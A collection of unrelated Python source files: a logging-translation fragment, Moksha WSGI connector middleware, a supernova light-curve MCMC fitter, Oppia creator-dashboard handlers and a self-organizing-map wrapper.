record.args = original_args
def _translate_and_log_record(self, record):
record.msg = translate(record.msg, self.locale)
# In addition to translating the message, we also need to translate
# arguments that were passed to the log method that were not part
# of the main message e.g., log.info(_('Some message %s'), this_one))
record.args = _translate_args(record.args, self.locale)
self.target.emit(record)
|
|
# This file is part of Moksha.
# Copyright (C) 2008-2010 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: John (J5) Palmieri <[email protected]>
import logging
import pkg_resources
import urllib
import time
import os.path
import threading
try:
import json
except ImportError:
import simplejson as json
from paste.deploy.converters import asbool
from webob import Request, Response
from pprint import pformat
from tg import config
log = logging.getLogger(__name__)
class MokshaConnectorMiddleware(object):
"""
A layer of WSGI middleware that is responsible for handling every
moksha_connector requests.
If a request for a connector comes in (/moksha_connector/$name), it will
run that connector as defined in it's egg-info.
"""
_connectors = {}
profile_id_counter = 0
profile_id_counter_lock = threading.Lock()
def __init__(self, application):
log.info('Creating MokshaConnectorMiddleware')
self.application = application
# ids of profile data we are waiting to collect and record
self.outstanding_profile_ids = {}
self.load_connectors()
def strip_script(self, environ, path):
# Strips the script portion of a url path so the middleware works even
# when mounted under a path other than root
if path.startswith('/') and 'SCRIPT_NAME' in environ:
prefix = environ.get('SCRIPT_NAME')
if prefix.endswith('/'):
prefix = prefix[:-1]
if path.startswith(prefix):
path = path[len(prefix):]
return path
def prof_collector(self, environ, request, start_response):
p = request.params
profile_id = p['id']
directory = config.get('profile.dir', '')
if self.outstanding_profile_ids.pop(profile_id, False):
prof_file_name = "jsonrequest_%s.jsprof" % profile_id
# output profiling data
file_name = os.path.join(directory, prof_file_name)
f = open(file_name, 'w')
f.write('{"id": "%s", "start_time": %s, "callback_start_time": %s, "end_time": %s}'
% (profile_id, p['start_time'], p['callback_start_time'], p['end_time']))
f.close()
return Response('{}')(environ, start_response)
return Response(status='404 Not Found')(environ, start_response)
def __call__(self, environ, start_response):
request = Request(environ)
path = self.strip_script(environ, request.path)
if path.startswith('/moksha_connector'):
s = path.split('/')[2:]
# check to see if we need to hand this off to the profile collector
if s[0] == 'prof_collector':
return self.prof_collector(environ, request, start_response)
# since keys are not unique we need to condense them
# into an actual dictionary with multiple entries becoming lists
p = request.params
params = {}
for k in p.iterkeys():
if k == '_cookies':
# reserved parameter
# FIXME: provide a proper error response
return Response(status='404 Not Found')
if k not in params:
params[k] = p.getall(k)
if params[k] and len(params[k]) == 1:
params[k] = params[k][0]
try:
response = self._run_connector(environ, request,
s[0], s[1], *s[2:],
**params)
except IndexError, e:
log.info('Invalid connector path: %s' % str(e))
return Response(status='404 Not Found')(environ, start_response)
else:
response = request.get_response(self.application)
return response(environ, start_response)
def _run_connector(self, environ, request,
conn_name, op, *path,
**remote_params):
response = None
# check last part of path to see if it is json data
dispatch_params = {};
if len(path) > 0:
p = urllib.unquote_plus(path[-1].lstrip())
if p.startswith('{'):
dp = json.loads(p)
f = dp.get('filters')
if isinstance(f, basestring):
dp['filters'] = json.loads(f)
path = path[:-1]
# scrub dispatch_params keys of unicode so we can pass as keywords
for (k, v) in dp.iteritems():
dispatch_params[str(k)] = v
# prevent trailing slash
if not p:
path = path[:-1]
path = '/'.join(path)
else:
path = ''
conn = self._connectors.get(conn_name)
# pretty print output
pretty_print = False
if '_pp' in remote_params:
del remote_params['_pp']
pretty_print = True
if conn:
conn_obj = conn['connector_class'](environ, request)
r = None
if asbool(config.get('profile.connectors')):
try:
import cProfile as profile
except ImportError:
import profile
directory = config.get('profile.dir', '')
# Make sure the id is unique for each thread
self.profile_id_counter_lock.acquire()
prof_id_counter = self.profile_id_counter
self.profile_id_counter += 1
self.profile_id_counter_lock.release()
ip = request.remote_addr
timestamp = time.time()
profile_id = "%s_%f_%s_%i" % (conn_name, timestamp, ip, prof_id_counter)
self.outstanding_profile_ids[profile_id] = True
prof_file_name = "connector_%s.prof" % profile_id
info_file_name = "connector_%s.info" % profile_id
# output call info
file_name = os.path.join(directory, info_file_name)
f = open(file_name, 'w')
f.write('{"name": "%s", "op": "%s", "path": "%s", "remote_params": %s, "ip": "%s", "timestamp": %f, "id_counter": %i, "id": "%s"}'
% (conn_name, op, path, json.dumps(remote_params), ip, timestamp, prof_id_counter, profile_id))
f.close()
# in order to get the results back we need to pass an object
# by refrence which will be populated with the actual results
result = {'r': None}
# profile call
file_name = os.path.join(directory, prof_file_name)
profile.runctx("result['r'] = conn_obj._dispatch(op, path, remote_params, **dispatch_params)",
None,
{'conn_obj': conn_obj,
'op': op,
'path': path,
'remote_params': remote_params,
'dispatch_params': dispatch_params,
'result': result},
file_name)
r = result['r']
# add profile id to results
r['moksha_profile_id'] = profile_id
else:
r = conn_obj._dispatch(op, path, remote_params, **dispatch_params)
if pretty_print:
r = '<pre>' + pformat(r) + '</pre>'
elif not isinstance(r, basestring):
r = json.dumps(r, separators=(',',':'))
if isinstance(r, unicode):
r = r.encode('utf-8', 'replace')
response = Response(r)
else:
response = Response(status='404 Not Found')
return response
def load_connectors(self):
log.info('Loading moksha connectors')
for conn_entry in pkg_resources.iter_entry_points('moksha.connector'):
log.info('Loading %s connector' % conn_entry.name)
conn_class = conn_entry.load()
# call the register class method
# FIXME: Should we pass some resource in?
conn_class.register()
conn_path = conn_entry.dist.location
self._connectors[conn_entry.name] = {
'name': conn_entry.name,
'connector_class': conn_class,
'path': conn_path,
}
def _get_connector(name, request=None):
# TODO: having a connection pool might be nice
cls = None
if name in MokshaConnectorMiddleware._connectors:
cls = MokshaConnectorMiddleware._connectors[name]['connector_class']
else:
# Look for it on the entry-point
for conn_entry in pkg_resources.iter_entry_points('moksha.connector'):
if conn_entry.name == name:
conn_class = conn_entry.load()
conn_class.register()
cls = conn_class
if request is None:
from pylons import request
if cls:
try:
return cls(request.environ, request)
except TypeError:
# Called outside of the WSGI stack
return cls(None, None)
|
|
#!/usr/bin/env python
"""
RS 2013/08/19: Stritzinger 2006 MCMC implementation
"""
# ----------------------------------------------------------------------------
# Dependencies
# ----------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as pypl
from scipy.optimize import curve_fit
from BoloMass.SNMCMC import SNMCMC
import BoloMass.Arnett82 as Arnett82
from BoloMass.Utils import BadInputError, VerboseMsg
# ----------------------------------------------------------------------------
# Class and function definitions
# ----------------------------------------------------------------------------
class Stritz06_MCMC(SNMCMC):
"""Stritzinger+ 2006 models for comparison with Scalzo+ 2012"""
# Features of standard blob of chain, with upper and lower bounds
_features = {
# name, def, blo, hlo, hhi, bhi, res, fmt, label
'MWD': [ 1.4, 0.0, 0.5, 2.5, 2.8, 0.05, "{0:8.2f}",
"Ejected mass (M$_\\odot$)"],
'MNi': [ 0.6, 0.0, 0.0, 2.0, 2.8, 0.05, "{0:8.2f}",
"$^{56}$Ni mass (M$_\\odot$)"],
't0': [ 40, 15, 15, 75, 75, 2, "{0:8.1f}",
"$^{56}$Co $\\gamma$-ray timescale t$_0$(days)"],
'kappa': [ 0.025, 0.0, 0.02, 0.03, 0.05, 0.0005, "{0:8.3f}",
"$^{56}$Co $\\gamma$-ray opacity $\\kappa$ (cm$^2$ g$^{-1}$)"],
'v_e': [ 3000, 1000, 2000, 4000, 5000, 100, "{0:8.0f}",
"Scaling velocity v$_{e}$ (km s$^{-1}$)"],
'vsc': [10000, 7000, 7000, 14000, 14000, 100, "{0:8.0f}",
"Scaling velocity v$_{sc}$ (km s$^{-1}$)"],
'muoff': [ 0.0, -10.0, -1.0, 1.0, 10.0, 0.05, "{0:8.2f}",
"Distance modulus systematic (mag)"],
'q': [ 0.33, 0.0, 0.0, 0.65, 1.0, 0.05, "{0:8.2f}",
"$^{56}$Ni distribution form factor q"],
'trise': [17.6, 10.0, 10.0, 24.0, 24.0, 0.5, "{0:8.1f}",
"Rise time (days)"],
'uvcor': [ 0.1, 0.0, 0.0, 0.2, 0.2, 0.01, "{0:8.2f}",
"UV flux correction fraction"],
}
# Names of features to be used as main MCMC parameters
_mcmcpars = ['MWD', 'MNi', 'v_e', 'kappa', 'q', 'trise', 'muoff', 'uvcor']
# Names of features for which to report marginalized confidence intervals
_confints = ['MWD', 'MNi', 't0', 'v_e', 'vsc',
'kappa', 'q', 'trise', 'muoff', 'uvcor']
# Description of subplots to plot when MCMC is done running
# In _subplots, a 1-tuple produces a histogram, while a 2-tuple produces
# a marginalized joint confidence contour plot for both features.
_subplot_layout = (2, 2)
_subplots = [ ('MNi', 'MWD'), ('MWD',), ]
_contlvls = [0.01, 0.05, 0.16, 0.50, 0.84, 0.95, 0.99]
# Default keywords for __init__, with default values
# These include the default Stritzinger priors on trize, kappa, v_e, and q.
_init_kwdef = { 'muoff': 0.0, 'muoff_err': 1e-3,
'uvcor_lo': 0.0, 'uvcor_hi': 0.1,
'trise': 19.0, 'trise_err': 3.0,
'kappa': 0.025, 'kappa_err': 0.0025,
'v_e': 3000, 'v_e_err': 300,
'q': 0.3333, 'q_err': 0.1,
'sn_name': "", 'verbose': True }
def __init__(self, t, L, dL, **init_kwargs):
"""Initialize!
t: time since bolometric maximum light, in days
L: bolometric luminosity in erg/s
dL: 1-sigma error on bolometric luminosity in erg/s
muoff: offset to apply to distance modulus, if any
muerr: error on distance modulus offset
qtabpkl: filename of pickled QGP object
sn_name: name of SN (optional)
"""
# Unpack kwargs
kw = dict(self._init_kwdef)
kw.update(init_kwargs)
# First-pass initialization
self.name = kw['sn_name']
self.vmsg = VerboseMsg(prefix="Stritz06_MCMC({0})".format(self.name),
verbose=kw['verbose'], flush=True)
# In this version we only care about stuff near maximum light and at
# late times. Separate out the points we're actually going to fit.
AA = np.array
self.tfit, self.Lfit, self.dLfit = AA(t), AA(L), AA(dL)
t_max, t_late = np.abs(self.tfit).min(), 39.9
idx = np.any([self.tfit == t_max, self.tfit > t_late], axis=0)
nidx = np.invert(idx)
self.ifit, self.infit = idx, nidx
self.tfit, self.tnfit = self.tfit[idx], self.tfit[nidx]
self.Lfit, self.Lnfit = self.Lfit[idx], self.Lfit[nidx]
self.dLfit, self.dLnfit = self.dLfit[idx], self.dLfit[nidx]
self.vmsg("Fitting the following light curve:\n",
"\n".join(["{0:8.1f} {1:.3e} {2:.3e}".format(ti, Li, dLi)
for ti, Li, dLi in zip(self.tfit, self.Lfit, self.dLfit)]))
# Priors other than hard parameter bounds
self.trise_Pmu, self.trise_Psig = kw['trise'], kw['trise_err']
self.muoff_Pmu, self.muoff_Psig = kw['muoff'], kw['muoff_err']
self.kappa_Pmu, self.kappa_Psig = kw['kappa'], kw['kappa_err']
self.v_e_Pmu, self.v_e_Psig = kw['v_e'], kw['v_e_err']
self.q_Pmu, self.q_Psig = kw['q'], kw['q_err']
uvcor_lo, uvcor_hi = kw['uvcor_lo'], kw['uvcor_hi']
uvcor_av = 0.5*(uvcor_hi + uvcor_lo)
uvcor_ss = 0.01*(uvcor_hi - uvcor_lo)
self.uvcor_Plo, self.uvcor_Phi = uvcor_lo, uvcor_hi
self._features['uvcor'][0:6] = [uvcor_av, uvcor_lo, uvcor_lo,
uvcor_hi, uvcor_hi, uvcor_ss]
# A chi-square fit to the light curve has at most 2 degrees of freedom
# (MNi, t0) for goodness-of-fit, since those are the only parameters
# we're *fitting* (rest are marginalized).
self.ndof = max(1, len(self.tfit) - 2)
# Quick fit to the light curve and use it as the initial guess,
# if we have enough points; otherwise just assume the default.
if len(self.tfit) > 2:
MNi, t0 = self.leastsq_MNit0()
else:
MNi, t0 = 0.6, 40
sf = self._features
sf['MNi'][0] = MNi
sf['MWD'][0] = 1.4 - MNi
sf['trise'][0] = self.trise_Pmu
sf['muoff'][0] = self.muoff_Pmu
# Initialize the MCMC bits
SNMCMC.__init__(self, verbose=kw['verbose'])
def leastsq_MNit0(self):
"""Does a simple least-squares fit to get initial-guess (MNi, t0)"""
# Adjust for UV correction and distance modulus errors
Kmax = (1 + 0.5*(self.uvcor_Plo + self.uvcor_Phi))
my_tfit = self.tfit + self.trise_Pmu
my_Lfit = self.Lfit * 10**(-0.4*self.muoff_Pmu)
my_dLfit = self.dLfit * 10**(-0.4*self.muoff_Pmu)
my_Lfit[self.tfit < 10.0] *= Kmax
my_dLfit[self.tfit < 10.0] *= Kmax
# Fit the curve
epsL = lambda t, MNi, t0: MNi * Arnett82.epsilon(t, t0)
popt, pcov = curve_fit(epsL, my_tfit, my_Lfit, sigma=my_dLfit,
p0=[0.5, 40])
MNi_fit, t0_fit = popt
MNi_err, t0_err = pcov[0,0]**0.5, pcov[1,1]**0.5
# Report the results
self.vmsg("least squares fit gives",
"MNi = {0:.2f} +/- {1:.2f} Msol".format(MNi_fit, MNi_err),
"t0 = {0:.1f} +/- {1:.1f} days".format(t0_fit, t0_err))
resid = epsL(my_tfit, MNi_fit, t0_fit) - my_Lfit
chisq = np.sum((resid/my_dLfit)**2)
self.vmsg("chisq/nu = {0:.2f}/{1} = {2:.2f}".format(
chisq, self.ndof, chisq/self.ndof))
return MNi_fit, t0_fit
def fillblob(self, pars):
"""Fills a blob with everything but likelihood and prior
Since PTSampler doesn't support blobs, it makes sense for us to break
out the blob-filling capabilities so that we don't do them over and
over needlessly. In point of fact, we need to calculate most of the
blob quantities to calculate the likelihood, but there's no sense in
re-evaluating the log likelihood if all we want is the blob.
"""
# Unpack parameters from vector
MWD, MNi, v_e, kappa, q, trise, muoff, uvcor = pars
# Default blob
blob = dict(self._default_blob)
blob.update({ 'MWD': MWD, 'MNi': MNi, 'v_e': v_e, 'q': q,
'trise': trise, 'muoff': muoff, 'uvcor': uvcor,
'fail': 'default' })
# Get rid of unphysical fits with extreme prejudice
if MWD < MNi:
blob['fail'] = "badMWD"
return blob
# Fill the regular vsc for comparison with other models
vsc = np.sqrt(12)*v_e
# Calculate t0 based on v_e from Stritzinger's original expression
t0 = np.sqrt((MWD*2e+33) * kappa * q / (8*np.pi)) / (v_e*1e+5) / 86400
# Update blob with physical solution
blob.update({ 'vsc': vsc, 'v_e': v_e, 't0': t0, 'q': q, 'fail': None })
return blob
def logl(self, pars, blob=None):
"""Log likelihood *only* for PTSampler
This assumes that all the parameters lie within bounds laid out in
self._features. Implicit bounds caused by physics *necessary* for the
likelihood to make sense, e.g., binding energy, must be included here.
"""
# Fill the blob first, if necessary
if blob is None:
blob = Stritz06_MCMC.fillblob(self, pars)
if blob['fail'] is not None:
return -np.inf
MNi, trise, t0, muoff, uvcor = [blob[f] for f in
('MNi', 'trise', 't0', 'muoff', 'uvcor')]
# Model: energy deposited (effective alpha = 1)
model = MNi * Arnett82.epsilon(self.tfit + trise, t0)
# Data: include distance modulus offset, plus UV near max
data = self.Lfit * 10**(-0.4*muoff)
data[self.tfit < 10.0] *= (1 + uvcor)
# Calculate chi-square
chisq = (((model - data)/self.dLfit)**2).sum()
return self.lnPchisq(chisq, self.ndof)
def logp(self, pars, blob=None):
"""Log prior *only* for PTSampler
This assumes that all the parameters lie within bounds laid out in
self._features. Implicit bounds caused by physics assumed beyond
what's needed to calculate the likelihood, e.g., neutronization,
must be included here.
"""
# Unpack parameters from vector
MWD, MNi, v_e, kappa, q, trise, muoff, uvcor = pars
# Prior terms P(theta), some fixed in the Stritzinger+ 2006 text
chpri = ((trise - self.trise_Pmu) / self.trise_Psig)**2
chpri += ((muoff - self.muoff_Pmu) / self.muoff_Psig)**2
chpri += ((kappa - self.kappa_Pmu) / self.kappa_Psig)**2
chpri += ((v_e - self.v_e_Pmu) / self.v_e_Psig)**2
chpri += ((q - self.q_Pmu) / self.q_Psig)**2
return -0.5*chpri
def show_results(self, makeplots=True, showplots=True, plotfname=None):
"""Overload of show_results including light curve fit"""
# If we're going to save or show plots, we have to make them first
if plotfname or showplots: makeplots = True
# First show the contour plots etc.
SNMCMC.show_results(self, makeplots=makeplots, showplots=False)
if sum(self.goodidx) < 5:
self.vmsg("No good blobs, hence no results to show!")
return
# Count the super-Chandra fraction etc.
goodblobs = np.array([b for b in self.bloblist[self.goodidx]])
goodprobs = np.array([b for b in self.lnproblist[self.goodidx]])
SChidx = np.array([b['MWD'] > 1.4 for b in goodblobs])
SChblobs = goodblobs[SChidx]
SChprobs = np.exp(goodprobs[SChidx])
print " fraction of samples with MWD > 1.4: {0}".format(
len(SChblobs) / float(len(goodblobs)))
if len(SChblobs) > 0:
print " highest probability with MWD > 1.4: {0}".format(
np.max(SChprobs))
# Calculate the best-fit light curve
best_blob = goodblobs[goodprobs.argmax()]
self.best_model_t = np.arange(
-5.0, max(self.tfit[-1], self.tnfit[-1], 1.0))
self.best_model_L = best_blob['MNi'] * Arnett82.epsilon(
self.best_model_t + best_blob['trise'], best_blob['t0'])
# Then show the light curve fit in the bottommost panel
if not makeplots: return
pypl.subplot(2, 1, 2)
pypl.plot(self.best_model_t, np.log10(self.best_model_L),
color='g', ls='-')
pypl.errorbar(self.tfit, np.log10(self.Lfit),
yerr=np.log10(1.0 +self.dLfit/self.Lfit),
c = 'g', ls='None', marker='o')
pypl.errorbar(self.tnfit, np.log10(self.Lnfit),
yerr=np.log10(1.0 +self.dLnfit/self.Lnfit),
c = 'r', ls='None', marker='o')
pypl.xlabel("Days Since Bolometric Maximum Light")
pypl.ylabel("Bolometric Luminosity (erg/s)")
fig = pypl.gcf()
fig.set_size_inches(7.5, 7.5)
pypl.subplots_adjust(left=0.1, right=0.9, bottom=0.10, top=0.95,
wspace=0.30, hspace=0.25)
if plotfname:
pypl.savefig(plotfname, dpi=100)
if showplots:
pypl.show()
|
|
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Controllers for the creator dashboard, notifications, and creating new
activities.
"""
from __future__ import annotations
import logging
from core import feconf
from core import utils
from core.constants import constants
from core.controllers import acl_decorators
from core.controllers import base
from core.domain import collection_domain
from core.domain import collection_services
from core.domain import exp_domain
from core.domain import exp_fetchers
from core.domain import exp_services
from core.domain import feedback_services
from core.domain import role_services
from core.domain import subscription_services
from core.domain import suggestion_services
from core.domain import summary_services
from core.domain import topic_fetchers
from core.domain import user_services
EXPLORATION_ID_KEY = 'exploration_id'
COLLECTION_ID_KEY = 'collection_id'
class OldContributorDashboardRedirectPage(base.BaseHandler):
"""Redirects the old contributor dashboard URL to the new one."""
URL_PATH_ARGS_SCHEMAS = {}
HANDLER_ARGS_SCHEMAS = {'GET': {}}
@acl_decorators.open_access
def get(self):
"""Handles GET requests."""
self.redirect('/contributor-dashboard', permanent=True)
class OldCreatorDashboardRedirectPage(base.BaseHandler):
"""Redirects the old creator dashboard URL to the new one."""
URL_PATH_ARGS_SCHEMAS = {}
HANDLER_ARGS_SCHEMAS = {'GET': {}}
@acl_decorators.open_access
def get(self):
"""Handles GET requests."""
self.redirect(feconf.CREATOR_DASHBOARD_URL, permanent=True)
class CreatorDashboardPage(base.BaseHandler):
"""Page showing the user's creator dashboard."""
ADDITIONAL_DEPENDENCY_IDS = ['codemirror']
URL_PATH_ARGS_SCHEMAS = {}
HANDLER_ARGS_SCHEMAS = {'GET': {}}
@acl_decorators.can_access_creator_dashboard
def get(self):
self.render_template('creator-dashboard-page.mainpage.html')
class CreatorDashboardHandler(base.BaseHandler):
"""Provides data for the user's creator dashboard page."""
GET_HANDLER_ERROR_RETURN_TYPE = feconf.HANDLER_TYPE_JSON
URL_PATH_ARGS_SCHEMAS = {}
HANDLER_ARGS_SCHEMAS = {
'GET': {},
'POST': {
'display_preference': {
'schema': {
'type': 'basestring',
'choices': (
constants.ALLOWED_CREATOR_DASHBOARD_DISPLAY_PREFS
.values()
)
}
}
}
}
@acl_decorators.can_access_creator_dashboard
def get(self):
"""Handles GET requests."""
def _round_average_ratings(rating):
"""Returns the rounded average rating to display on the creator
dashboard.
Args:
rating: float. The rating of the lesson.
Returns:
float. The rounded average value of rating.
"""
return round(
rating, feconf.AVERAGE_RATINGS_DASHBOARD_PRECISION)
subscribed_exploration_summaries = (
exp_fetchers.get_exploration_summaries_subscribed_to(
self.user_id))
subscribed_collection_summaries = (
collection_services.get_collection_summaries_subscribed_to(
self.user_id))
exploration_ids_subscribed_to = [
summary.id for summary in subscribed_exploration_summaries]
exp_summary_dicts = summary_services.get_displayable_exp_summary_dicts(
subscribed_exploration_summaries)
collection_summary_dicts = []
feedback_thread_analytics = (
feedback_services.get_thread_analytics_multi(
exploration_ids_subscribed_to))
# TODO(bhenning): Update this to use unresolved answers from
# stats_services once the training interface is enabled and it's cheaper
# to retrieve top answers from stats_services.
for ind, exploration in enumerate(exp_summary_dicts):
exploration.update(feedback_thread_analytics[ind].to_dict())
exp_summary_dicts = sorted(
exp_summary_dicts,
key=lambda x: (x['num_open_threads'], x['last_updated_msec']),
reverse=True)
topic_summaries = topic_fetchers.get_all_topic_summaries()
topic_summary_dicts = [
summary.to_dict() for summary in topic_summaries]
if role_services.ACTION_CREATE_COLLECTION in self.user.actions:
for collection_summary in subscribed_collection_summaries:
# TODO(sll): Reuse _get_displayable_collection_summary_dicts()
# in summary_services, instead of replicating it like this.
collection_summary_dicts.append({
'id': collection_summary.id,
'title': collection_summary.title,
'category': collection_summary.category,
'objective': collection_summary.objective,
'language_code': collection_summary.language_code,
'last_updated_msec': utils.get_time_in_millisecs(
collection_summary.collection_model_last_updated),
'created_on': utils.get_time_in_millisecs(
collection_summary.collection_model_created_on),
'status': collection_summary.status,
'node_count': collection_summary.node_count,
'community_owned': collection_summary.community_owned,
'thumbnail_icon_url': (
utils.get_thumbnail_icon_url_for_category(
collection_summary.category)),
'thumbnail_bg_color': utils.get_hex_color_for_category(
collection_summary.category),
})
dashboard_stats = user_services.get_dashboard_stats(self.user_id)
dashboard_stats.update({
'total_open_feedback': feedback_services.get_total_open_threads(
feedback_thread_analytics)
})
if dashboard_stats and dashboard_stats.get('average_ratings'):
dashboard_stats['average_ratings'] = (
_round_average_ratings(dashboard_stats['average_ratings']))
last_week_stats = (
user_services.get_last_week_dashboard_stats(self.user_id))
if last_week_stats and len(list(last_week_stats.keys())) != 1:
logging.exception(
'\'last_week_stats\' should contain only one key-value pair'
' denoting last week dashboard stats of the user keyed by a'
' datetime string.')
last_week_stats = None
if last_week_stats:
# 'last_week_stats' is a dict with only one key-value pair denoting
# last week dashboard stats of the user keyed by a datetime string.
datetime_of_stats = list(last_week_stats.keys())[0]
last_week_stats_average_ratings = (
list(last_week_stats.values())[0].get('average_ratings'))
if last_week_stats_average_ratings:
last_week_stats[datetime_of_stats]['average_ratings'] = (
_round_average_ratings(last_week_stats_average_ratings))
subscriber_ids = subscription_services.get_all_subscribers_of_creator(
self.user_id)
subscribers_settings = user_services.get_users_settings(subscriber_ids)
subscribers_list = []
for index, subscriber_settings in enumerate(subscribers_settings):
subscriber_summary = {
'subscriber_picture_data_url': (
subscriber_settings.profile_picture_data_url),
'subscriber_username': subscriber_settings.username,
'subscriber_impact': (
user_services.get_user_impact_score(subscriber_ids[index]))
}
subscribers_list.append(subscriber_summary)
user_settings = user_services.get_user_settings(
self.user_id, strict=False)
creator_dashboard_display_pref = (
user_settings.creator_dashboard_display_pref)
suggestions_created_by_user = suggestion_services.query_suggestions(
[('author_id', self.user_id),
(
'suggestion_type',
feconf.SUGGESTION_TYPE_EDIT_STATE_CONTENT)])
suggestions_which_can_be_reviewed = (
suggestion_services
.get_all_suggestions_that_can_be_reviewed_by_user(self.user_id))
for s in suggestions_created_by_user:
s.populate_old_value_of_change()
for s in suggestions_which_can_be_reviewed:
s.populate_old_value_of_change()
suggestion_dicts_created_by_user = (
[s.to_dict() for s in suggestions_created_by_user])
suggestion_dicts_which_can_be_reviewed = (
[s.to_dict() for s in suggestions_which_can_be_reviewed])
ids_of_suggestions_created_by_user = (
[s['suggestion_id'] for s in suggestion_dicts_created_by_user])
ids_of_suggestions_which_can_be_reviewed = (
[s['suggestion_id']
for s in suggestion_dicts_which_can_be_reviewed])
threads_linked_to_suggestions_by_user = (
[t.to_dict() for t in feedback_services.get_multiple_threads(
ids_of_suggestions_created_by_user)])
threads_linked_to_suggestions_which_can_be_reviewed = (
[t.to_dict() for t in feedback_services.get_multiple_threads(
ids_of_suggestions_which_can_be_reviewed)])
self.values.update({
'explorations_list': exp_summary_dicts,
'collections_list': collection_summary_dicts,
'dashboard_stats': dashboard_stats,
'last_week_stats': last_week_stats,
'subscribers_list': subscribers_list,
'display_preference': creator_dashboard_display_pref,
'threads_for_created_suggestions_list': (
threads_linked_to_suggestions_by_user),
'threads_for_suggestions_to_review_list': (
threads_linked_to_suggestions_which_can_be_reviewed),
'created_suggestions_list': suggestion_dicts_created_by_user,
'suggestions_to_review_list': (
suggestion_dicts_which_can_be_reviewed),
'topic_summary_dicts': topic_summary_dicts
})
self.render_json(self.values)
@acl_decorators.can_access_creator_dashboard
def post(self):
creator_dashboard_display_pref = (
self.normalized_payload.get('display_preference'))
user_services.update_user_creator_dashboard_display(
self.user_id, creator_dashboard_display_pref)
self.render_json({})
class NewExplorationHandler(base.BaseHandler):
"""Creates a new exploration."""
URL_PATH_ARGS_SCHEMAS = {}
HANDLER_ARGS_SCHEMAS = {
'POST': {
'title': {
'schema': {
'type': 'basestring'
},
'default_value': feconf.DEFAULT_EXPLORATION_TITLE
}
}
}
@acl_decorators.can_create_exploration
def post(self):
"""Handles POST requests."""
title = self.normalized_payload.get('title')
new_exploration_id = exp_fetchers.get_new_exploration_id()
exploration = exp_domain.Exploration.create_default_exploration(
new_exploration_id, title=title)
exp_services.save_new_exploration(self.user_id, exploration)
self.render_json({
EXPLORATION_ID_KEY: new_exploration_id
})
class NewCollectionHandler(base.BaseHandler):
"""Creates a new collection."""
URL_PATH_ARGS_SCHEMAS = {}
HANDLER_ARGS_SCHEMAS = {
'POST': {}
}
@acl_decorators.can_create_collection
def post(self):
"""Handles POST requests."""
new_collection_id = collection_services.get_new_collection_id()
collection = collection_domain.Collection.create_default_collection(
new_collection_id)
collection_services.save_new_collection(self.user_id, collection)
self.render_json({
COLLECTION_ID_KEY: new_collection_id
})
class UploadExplorationHandler(base.BaseHandler):
"""Uploads a new exploration."""
URL_PATH_ARGS_SCHEMAS = {}
HANDLER_ARGS_SCHEMAS = {
'POST': {
'yaml_file': {
'schema': {
'type': 'basestring'
},
'default_value': None
}
}
}
@acl_decorators.can_upload_exploration
def post(self):
"""Handles POST requests."""
yaml_content = self.normalized_request.get('yaml_file')
new_exploration_id = exp_fetchers.get_new_exploration_id()
if constants.ALLOW_YAML_FILE_UPLOAD:
exp_services.save_new_exploration_from_yaml_and_assets(
self.user_id, yaml_content, new_exploration_id, [],
strip_voiceovers=True)
self.render_json({
EXPLORATION_ID_KEY: new_exploration_id
})
else:
raise self.InvalidInputException(
'This server does not allow file uploads.')
|
|
#!/usr/local/bin python
# -*- coding: utf-8 -*-
from SOM.Model import SOM, run
from SOM import logger
from SOM import Map
from SOM import Coefficients as coef
from map_eval import map_eval
import RPSOM_config
import numpy as np
import copy
class RPSOM:
def __init__ (self, epochs=10
, map_size_x=10, map_size_y=10
, input_num =16, input_size=16
, class_names=None, feature_names=None
, input_file=None
, weight=None
, alpha_max=[0.1, 0.3, 0.5]
, alpha_min=[0.01, 0.05, 0.1]
, sigma_max=[5, 7, 10]
, sigma_min=[1, 3, 5]
, unit_shape = "Square"
, log_file = None
, config_dict = None
):
self.config = {}
self.map_size_y = map_size_y
self.map_size_x = map_size_x
self.input_num = input_num
self.input_size = input_size
len_amax = len(alpha_max)
len_amin = len(alpha_min)
len_smax = len(sigma_max)
len_smin = len(sigma_min)
if len_amax != len_amin:
print "mismatch the alpha size: alpha_max=%d, alpha_min=%d" % (len_amax, len_amin)
quit()
if len_smax != len_smin:
print "mismatch the sigma size: sigma_max=%d, sigma_min=%d" % (len_smax, len_smin)
quit()
self.alpha_max = alpha_max
self.alpha_min = alpha_min
self.sigma_max = sigma_max
self.sigma_min = sigma_min
self.ways = len_amax * len_smax
self.epochs = epochs
self.som_class = np.zeros((map_size_y, map_size_x), dtype=int)
self.d_indx = []
if class_names is None:
self.class_names = None
else :
self.class_names = class_names
if feature_names is None:
self.feature_names = None
else :
self.feature_names = feature_names
if config_dict:
RPSOM_config.set_rpsom_params (self, config_dict)
if input_file is None:
self.input_x = np.zeros((input_num, input_size))
else :
import pandas
data = pandas.read_csv (input_file, index_col="label")
tmp = data.as_matrix()
self.input_x = tmp[:,:]
self.input_num = len(self.input_x)
self.input_size = len(self.input_x[0])
self.feature_names = list(data.columns)
self.class_names = list(data.index)
input_file = None
if log_file:
self.log_fp=open(log_file, "w")
else :
self.log_fp=None
self.som = []
for i in range(len_amax):
for j in range(len_smax):
self.som.append ( SOM ( epochs=self.epochs
, map_size_y=self.map_size_y, map_size_x=self.map_size_x
, input_num=self.input_num, input_size=self.input_size
, class_names=self.class_names
, feature_names=self.feature_names
, input_file=input_file
, weight=weight
, alpha_max=alpha_max[i], alpha_min=alpha_min[i]
, sigma_max=sigma_max[j], sigma_min=sigma_min[j]
, unit_shape = unit_shape
, log_fp = self.log_fp
)
)
RPSOM_config.conf2dict(self)
def set_config (self, params_dict=None):
RPSOM_config.set_rpsom_params (self, params_dict)
self.recreate ()
def recreate (self):
self.som_class = np.zeros((map_size_y, map_size_x), dtype=int)
